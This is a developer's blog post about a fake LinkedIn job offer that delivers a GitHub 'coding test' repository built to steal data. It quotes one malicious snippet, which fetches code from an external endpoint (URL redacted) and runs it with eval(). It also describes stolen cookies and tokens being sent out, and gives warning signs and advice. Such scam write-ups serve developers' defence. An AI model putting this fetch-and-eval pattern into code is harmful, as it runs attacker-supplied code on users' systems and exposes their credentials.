How GitHub Repositories Became the Modern-Day Trojan Horses
Introduction
In today's digital world, scams are evolving as quickly as the technologies they target. Everyone remembers the infected .EXE files or the painfully obvious phishing emails. But these days, scams have become far more sophisticated, hiding in other places — like GitHub repositories, where developers are directly targeted. In this post, I'll share my personal experience with a Web3 coding test scam and help you hopefully recognize the warning signs.
The Invitation
Like many remote gigs, it all started with a friendly message in my LinkedIn inbox:
"Hello, Nuri
Happy New Year!
I'm leading an exciting blockchain project with great earning potential. I'd love to discuss how your skills could fit. Reply here to explore further.
Best regards,
Tim"
Tim explained the project in further detail:
"This is a demo version of our ongoing project, showcasing the core features and functionality we're building. In this project, your main tasks will involve adding blockchain networks (such as Ethereum, Binance Smart Chain, and Polygon), integrating a variety of tokens (like ERC-20, BEP-20, and stablecoins such as USDT), and enabling wallet functionalities (supporting wallets like MetaMask, Trust Wallet, and WalletConnect) on the platform.
To be successful in this role, you'll need a strong background in Web3 development, as well as extensive experience with smart contracts, including their design, implementation, and security considerations.
We've already completed several foundational elements of the front-end and back-end systems. Your primary focus will be on strengthening the Web3 integration and advancing the smart contract capabilities. This includes expanding blockchain network support, refining token integrations, and optimizing wallet compatibility to improve user interaction with the platform."
It all seemed professional, so I replied, "Sure, I can take on a part-time gig!" Then Tim moved things along quickly — asking for my hourly rate and when I could start. Once I named a rate, he immediately agreed (red flag). He also mentioned a "technical review," a "coding test," and a "panel review" before signing a contract. Sounded legit — like a normal hiring process, right?
I decided to test his patience by suggesting we wait two weeks. He pushed for an earlier start date (another red flag). Still, I agreed to do the coding test in my free time, and he sent me a private GitHub repo invite. 😏😏
Let’s Go Deeper
Inside GitHub, I found what looked like a standard React project with Web3 utilities (ethers.js) and plenty of files. At first glance, it seemed like a real project: a website, a lot of code, and an outline of features. However, I noticed the GitHub user had only existed for three weeks, had one commit, and the repo had zero contributors — clearly another red flag.
Digging through the code, I stumbled on this snippet:
async function getCookie(params) {
const res = await axios.get('https://api.npoint.io/--I removed this--');
eval(res.data.cookie);
}
Two Major Issues Jumped Out
- It's calling an external API.
-
It's using
eval().
eval() in JavaScript runs code from a string—risky in most situations, especially if the source is shady or unknown.
Curious, I fired up Postman to see what the endpoint returned. It was an obfuscated JSON object containing even more JavaScript code which could:
- Steal cookies and session tokens
- Access browser storage (e.g.,
localStorage) - Make unauthorized API calls
- Forward stolen data to the scammers' own server
This wasn't a normal coding test; it was more like a Trojan horse.
What Made It So Devious
We've probably all heard of the "Nigerian prince" email scams, but this felt different. Why?
- Hyper-Targeted: They referenced my background, found me on LinkedIn, and tailored their approach.
- Professional Tone: The communication was well-structured, with no glaring mistakes.
After sharing the code, they asked which operating system I use and wanted a call in the middle of the night. We ended up having a late-night meeting (haha, I couldn’t ignore this one). The person on the call spoke with an African/French accent and jumped straight into questions about my experience—no introduction, no pleasantries.
When I said I had over 10 years of coding experience, he asked me to show my screen and share some of my work. I declined and asked him to share his screen instead. 😂 He claimed he couldn't, so I said, "Same here," and then the call suddenly ended.
So, I sent a message to Tim on LinkedIn:
Nuri Vladimir Ensing (1:45 AM):
I could not understand that man.
His English is very bad.
But hey, tell the guy to improve hisevalcode 🤣LinkedIn Member (1:47 AM):
You are very unprofessional.
You are a junior developer.
Bye
Then Tim blocked me. And the fun stopped here.. 🥲 So I cried… from laughter, lol, and wrote this blog post instead. 😄
Lessons Learned
If you ever come across a job online, always check:
-
Research the Company:
- Search online for the company's name, check LinkedIn profiles, and review any public repositories. A real, established team will have a digital footprint that's easy to find.
-
Request a Video Call:
- Ask for a call with cameras on. Genuine teams are more than happy to meet "face to face" and introduce themselves and their developers.
-
Ask About the Team:
- Find out who the other devs are, their roles, and how the project is structured. Scammers often struggle with detailed questions about team composition.
-
Check Their Repo:
- When they give access to their repo, check the status of the repo and the contributions made.
-
Use a Sandbox or VM:
- If you still want to test the code, do so in an isolated environment (like Docker or a virtual machine). Never run questionable code on your main system.
-
Trust Your Instincts:
- If the communication feels rushed, unprofessional, or contradictory, don't ignore that gut feeling. A legitimate employer is usually transparent and patient.
With ever-evolving technology — AI, deepfakes, sophisticated chatbots — the line between real and fake blurs more every day. In Web3, where anonymity is common, scammers exploit complexity and hype. They're not going away; they're simply refining their game.
Parting Thoughts
A decade ago, we worried about shady email attachments or strange .exe files. Now, scams can pop up in everyday coding tasks. Be cautious.
Top comments (0)